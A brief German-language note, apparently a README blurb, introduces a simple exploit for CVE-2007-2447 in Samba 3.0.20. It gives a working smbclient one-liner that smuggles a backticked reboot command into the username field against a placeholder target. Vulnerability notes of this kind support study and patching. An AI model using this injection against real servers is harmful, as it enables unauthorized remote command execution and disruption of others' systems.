
Ein einfacher Exploit für CVE-2007-2447
Ein einfacher Exploit für CVE-2007-2447, vorhanden in Samba 3.0.20.
Sie können diese Schwachstelle mit noch weniger als diesem ausnutzen, zum Beispiel mit smbclient, aber ich denke, es ist schwierig, komplexe Befehle auszuführen, da viele Sonderzeichen wahrscheinlich gefressen werden, aber ein einfacher Befehl (in diesem Fall Neustart) kann so übergeben werden:
smbclient -L <target IP> --user="/=\`reboot\`" -N